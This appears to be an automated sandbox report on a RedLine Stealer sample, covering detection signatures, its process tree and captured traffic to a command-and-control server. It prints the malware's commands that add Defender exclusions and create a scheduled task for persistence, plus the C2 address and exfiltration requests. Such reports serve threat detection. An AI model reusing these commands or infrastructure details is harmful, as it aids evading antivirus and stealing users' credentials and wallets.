Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
l2rMtmFkD6.exe

Overview

General Information

Sample name:l2rMtmFkD6.exe
renamed because original name is a hash value
Original sample name:1bac686fac8c55f6824923fd43ca0d9e.exe
Analysis ID:1507398
MD5:1bac686fac8c55f6824923fd43ca0d9e
SHA1:c2db9aade40ebea1df1c7ffc3622842cd0cc85a5
SHA256:c313a6efb824f05959851b88151e1070bbc84cbcd5c98be75256678bb8edada4
Tags:exeRedLineStealer
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected RedLine Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • l2rMtmFkD6.exe (PID: 6156 cmdline: "C:\Users\user\Desktop\l2rMtmFkD6.exe" MD5: 1BAC686FAC8C55F6824923FD43CA0D9E)
    • powershell.exe (PID: 2716 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\l2rMtmFkD6.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1560 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ECcZgk.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 1532 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 3628 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECcZgk" /XML "C:\Users\user\AppData\Local\Temp\tmp5831.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 3208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • l2rMtmFkD6.exe (PID: 3524 cmdline: "C:\Users\user\Desktop\l2rMtmFkD6.exe" MD5: 1BAC686FAC8C55F6824923FD43CA0D9E)
      • conhost.exe (PID: 4324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • ECcZgk.exe (PID: 1848 cmdline: C:\Users\user\AppData\Roaming\ECcZgk.exe MD5: 1BAC686FAC8C55F6824923FD43CA0D9E)
    • schtasks.exe (PID: 6352 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECcZgk" /XML "C:\Users\user\AppData\Local\Temp\tmp7D1E.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • ECcZgk.exe (PID: 3920 cmdline: "C:\Users\user\AppData\Roaming\ECcZgk.exe" MD5: 1BAC686FAC8C55F6824923FD43CA0D9E)
      • conhost.exe (PID: 4028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["185.222.58.233:55615"], "Bot Id": "cheat"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000008.00000002.2204536815.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000008.00000002.2204536815.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          00000008.00000002.2204536815.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_f54632ebunknownunknown
          • 0x133ca:$a4: get_ScannedWallets
          • 0x12228:$a5: get_ScanTelegram
          • 0x1304e:$a6: get_ScanGeckoBrowsersPaths
          • 0x10e6a:$a7: <Processes>k__BackingField
          • 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
          • 0x1079e:$a9: <ScanFTP>k__BackingField
          0000000B.00000002.2194835748.00000000037D8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0000000B.00000002.2194835748.00000000037D8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              Click to see the 18 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              11.2.ECcZgk.exe.37f0c38.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                11.2.ECcZgk.exe.37f0c38.1.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  11.2.ECcZgk.exe.37f0c38.1.unpackWindows_Trojan_RedLineStealer_f54632ebunknownunknown
                  • 0x117ca:$a4: get_ScannedWallets
                  • 0x10628:$a5: get_ScanTelegram
                  • 0x1144e:$a6: get_ScanGeckoBrowsersPaths
                  • 0xf26a:$a7: <Processes>k__BackingField
                  • 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
                  • 0xeb9e:$a9: <ScanFTP>k__BackingField
                  11.2.ECcZgk.exe.37f0c38.1.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                  • 0xe68a:$u7: RunPE
                  • 0x11d41:$u8: DownloadAndEx
                  • 0x7330:$pat14: , CommandLine:
                  • 0x11279:$v2_1: ListOfProcesses
                  • 0xe88b:$v2_2: get_ScanVPN
                  • 0xe92e:$v2_2: get_ScanFTP
                  • 0xf61e:$v2_2: get_ScanDiscord
                  • 0x1060c:$v2_2: get_ScanSteam
                  • 0x10628:$v2_2: get_ScanTelegram
                  • 0x106ce:$v2_2: get_ScanScreen
                  • 0x11416:$v2_2: get_ScanChromeBrowsersPaths
                  • 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths
                  • 0x11709:$v2_2: get_ScanBrowsers
                  • 0x117ca:$v2_2: get_ScannedWallets
                  • 0x117f0:$v2_2: get_ScanWallets
                  • 0x11810:$v2_3: GetArguments
                  • 0xfed9:$v2_4: VerifyUpdate
                  • 0x147ee:$v2_4: VerifyUpdate
                  • 0x11bca:$v2_5: VerifyScanRequest
                  • 0x112c6:$v2_6: GetUpdates
                  • 0x147cf:$v2_6: GetUpdates
                  0.2.l2rMtmFkD6.exe.3a80450.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 31 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\l2rMtmFkD6.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\l2rMtmFkD6.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\l2rMtmFkD6.exe", ParentImage: C:\Users\user\Desktop\l2rMtmFkD6.exe, ParentProcessId: 6156, ParentProcessName: l2rMtmFkD6.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\l2rMtmFkD6.exe", ProcessId: 2716, ProcessName: powershell.exe
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\l2rMtmFkD6.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\l2rMtmFkD6.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\l2rMtmFkD6.exe", ParentImage: C:\Users\user\Desktop\l2rMtmFkD6.exe, ParentProcessId: 6156, ParentProcessName: l2rMtmFkD6.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\l2rMtmFkD6.exe", ProcessId: 2716, ProcessName: powershell.exe
                    Sigma detected: Suspicious Add Scheduled Task Parent
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECcZgk" /XML "C:\Users\user\AppData\Local\Temp\tmp7D1E.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECcZgk" /XML "C:\Users\user\AppData\Local\Temp\tmp7D1E.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\ECcZgk.exe, ParentImage: C:\Users\user\AppData\Roaming\ECcZgk.exe, ParentProcessId: 1848, ParentProcessName: ECcZgk.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECcZgk" /XML "C:\Users\user\AppData\Local\Temp\tmp7D1E.tmp", ProcessId: 6352, ProcessName: schtasks.exe
                    Sigma detected: Suspicious Schtasks From Env Var Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECcZgk" /XML "C:\Users\user\AppData\Local\Temp\tmp5831.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECcZgk" /XML "C:\Users\user\AppData\Local\Temp\tmp5831.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\l2rMtmFkD6.exe", ParentImage: C:\Users\user\Desktop\l2rMtmFkD6.exe, ParentProcessId: 6156, ParentProcessName: l2rMtmFkD6.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECcZgk" /XML "C:\Users\user\AppData\Local\Temp\tmp5831.tmp", ProcessId: 3628, ProcessName: schtasks.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\l2rMtmFkD6.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\l2rMtmFkD6.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\l2rMtmFkD6.exe", ParentImage: C:\Users\user\Desktop\l2rMtmFkD6.exe, ParentProcessId: 6156, ParentProcessName: l2rMtmFkD6.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\l2rMtmFkD6.exe", ProcessId: 2716, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    barindex
                    Sigma detected: Scheduled temp file as task from temp location
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECcZgk" /XML "C:\Users\user\AppData\Local\Temp\tmp5831.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECcZgk" /XML "C:\Users\user\AppData\Local\Temp\tmp5831.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\l2rMtmFkD6.exe", ParentImage: C:\Users\user\Desktop\l2rMtmFkD6.exe, ParentProcessId: 6156, ParentProcessName: l2rMtmFkD6.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECcZgk" /XML "C:\Users\user\AppData\Local\Temp\tmp5831.tmp", ProcessId: 3628, ProcessName: schtasks.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-08T13:34:12.815267+020020450001Malware Command and Control Activity Detected185.222.58.23355615192.168.2.549706TCP
                    2024-09-08T13:34:22.483900+020020450001Malware Command and Control Activity Detected185.222.58.23355615192.168.2.549709TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-08T13:34:16.091559+020020450011Malware Command and Control Activity Detected185.222.58.23355615192.168.2.549706TCP
                    2024-09-08T13:34:26.050350+020020450011Malware Command and Control Activity Detected185.222.58.23355615192.168.2.549709TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-08T13:34:07.675915+020028496621Malware Command and Control Activity Detected192.168.2.549706185.222.58.23355615TCP
                    2024-09-08T13:34:17.207148+020028496621Malware Command and Control Activity Detected192.168.2.549709185.222.58.23355615TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-08T13:34:13.182629+020028493511Malware Command and Control Activity Detected192.168.2.549706185.222.58.23355615TCP
                    2024-09-08T13:34:22.843900+020028493511Malware Command and Control Activity Detected192.168.2.549709185.222.58.23355615TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-08T13:34:27.965773+020028482001Malware Command and Control Activity Detected192.168.2.549719185.222.58.23355615TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-08T13:34:16.501330+020028493521Malware Command and Control Activity Detected192.168.2.549708185.222.58.23355615TCP
                    2024-09-08T13:34:26.465626+020028493521Malware Command and Control Activity Detected192.168.2.549718185.222.58.23355615TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 11.2.ECcZgk.exe.37f0c38.1.raw.unpackMalware Configuration Extractor: RedLine {"C2 url": ["185.222.58.233:55615"], "Bot Id": "cheat"}
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for sample
                    Source: l2rMtmFkD6.exeJoe Sandbox ML: detected
                    Source: l2rMtmFkD6.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: l2rMtmFkD6.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeCode function: 4x nop then jmp 05D1D49Bh11_2_05D1DC2D

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.5:49706 -> 185.222.58.233:55615
                    Source: Network trafficSuricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.5:49708 -> 185.222.58.233:55615
                    Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.5:49709 -> 185.222.58.233:55615
                    Source: Network trafficSuricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 185.222.58.233:55615 -> 192.168.2.5:49706
                    Source: Network trafficSuricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.5:49706 -> 185.222.58.233:55615
                    Source: Network trafficSuricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 185.222.58.233:55615 -> 192.168.2.5:49706
                    Source: Network trafficSuricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 185.222.58.233:55615 -> 192.168.2.5:49709
                    Source: Network trafficSuricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.5:49709 -> 185.222.58.233:55615
                    Source: Network trafficSuricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 185.222.58.233:55615 -> 192.168.2.5:49709
                    Source: Network trafficSuricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.5:49718 -> 185.222.58.233:55615
                    Source: Network trafficSuricata IDS: 2848200 - Severity 1 - ETPRO MALWARE RedLine - GetUpdates Request : 192.168.2.5:49719 -> 185.222.58.233:55615
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: 185.222.58.233:55615
                    Uses known network protocols on non-standard ports
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49706
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49706
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49706
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49706
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49709
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49709
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49709
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49708
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49708
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49708
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49709
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49709
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49718
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49719
                    Source: global trafficTCP traffic: 192.168.2.5:49706 -> 185.222.58.233:55615
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.233:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.222.58.233:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.222.58.233:55615Content-Length: 978961Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.233:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.222.58.233:55615Content-Length: 978953Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.222.58.233:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.222.58.233:55615Content-Length: 978563Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.222.58.233:55615Content-Length: 978555Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: Joe Sandbox ViewASN Name: ROOTLAYERNETNL ROOTLAYERNETNL
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.233
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.233
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.233
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.233
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.233
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.233
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.233
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.233
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.233
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.233
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.233
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.233
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.233
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.233
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.233
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.233
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.233
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.233
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.233
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.233
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.233
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.233
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.233
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.233
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.233
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.233
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.233
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.233
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.233
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.233
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.233
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.233
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.233
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.233
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.233
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.233
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.233
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.233
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.233
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.233
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.233
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.233
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.233
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.233
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.233
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.233
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.233
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.233
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.233
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.233
                    Source: global trafficDNS traffic detected: DNS query: api.ip.sb
                    Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.233:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: ECcZgk.exe, 0000000E.00000002.2314976048.0000000003364000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.233:
                    Source: l2rMtmFkD6.exe, 00000008.00000002.2207175755.000000000333E000.00000004.00000800.00020000.00000000.sdmp, l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003221000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003299000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.233:55615
                    Source: l2rMtmFkD6.exe, 00000008.00000002.2207175755.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.233:55615/
                    Source: ECcZgk.exe, 0000000E.00000002.2314976048.0000000003299000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.233:55615t-
                    Source: l2rMtmFkD6.exe, ECcZgk.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                    Source: l2rMtmFkD6.exe, ECcZgk.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
